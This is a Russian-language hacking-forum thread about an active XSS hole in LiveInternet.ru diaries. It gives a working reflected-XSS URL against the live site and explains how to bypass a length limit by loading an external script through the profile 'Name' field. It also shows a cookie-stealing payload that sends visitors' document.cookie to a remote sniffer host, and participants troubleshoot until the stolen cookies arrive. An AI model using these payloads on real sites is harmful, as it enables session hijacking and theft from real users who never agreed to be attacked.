Форум АНТИЧАТ - Активная XSS в дневнике LiveInternet.ru

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Активная XSS в дневнике LiveInternet.ru (https://forum.antichat.xyz/showthread.php?t=91539)

=\ хацкер!!! ;D

Объяснил для тех кто не соображает.

Ога,пантанулся,надо было у себя держать,щас ее быстро прикроют.

http://forum.antichat.ru/showpost.php?p=883295&postcount=269

Цитата:

Сообщение от Zinus

сорри,Не знал, удаляйте значит топик

http://www.liveinternet.ru/tests.php?cmd=show&session_id=a2377cc8c3a9eec8d990 121c03cbf124&order=%22%3E%3Cscript%3Ealert('%EF%E0 %F1%F1%E8%E2%EA%E0')%3C/script%3E

Цитата:

Чтобы обойти ограничение на кол-во символов нужно залить js файл к себе на хост, а в поле "Имя" вставить <script src="http://site/file.js"></script>.

Создаю аккаунт на бесплатном хостинге holm.ru , заливаю туда следующий скрипт, который должен отправлять куки зашедшего на сниффер:

img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

в файле 1.js, итак пишу ссылку <script>http://hzz.h18.ru/1.js</script> в "Имя".
Захожу в профиль, после этого сразу открываю http://old.antichat.ru/sniff/log.php . И ничего нового на сниффер не ушло.

Я не очень хорошо разбираюсь в javascript, но вроде-бы это должно работать?? Подскажите, что здесь не так?

Цитата:

Сообщение от ickhz

указывай

http://old.antichat.ru/cgi-bin/s.jpg
а не
http://antichat.ru/cgi-bin/s.jpg

Код:

<script src="http://hzz.h18.ru/1.js"> 

</script>